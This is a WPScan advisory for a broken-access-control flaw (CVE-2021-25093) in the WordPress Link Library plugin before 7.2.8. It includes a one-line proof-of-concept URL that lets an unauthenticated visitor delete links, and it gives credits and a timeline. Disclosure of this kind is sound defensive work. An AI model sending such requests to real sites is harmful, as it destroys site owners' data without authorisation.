WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Link Library < 7.2.8 - Unauthenticated Arbitrary Links Deletion

Description

The plugin does not have authorisation in place when deleting links, allowing unauthenticated users to delete arbitrary links via a crafted request

Proof of Concept

https://example.com/?post_type=link_library_links&ll60reupdate=1

Affects Plugins

link-library
Fixed in version 7.2.9

References

CVE
CVE-2021-25093

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
7a7603ce-d76d-4c49-a886-67653bed8cd3

Timeline

Publicly Published

2021-12-30 (about 9 months ago)

Added

2021-12-30 (about 9 months ago)

Last Updated

2022-04-13 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin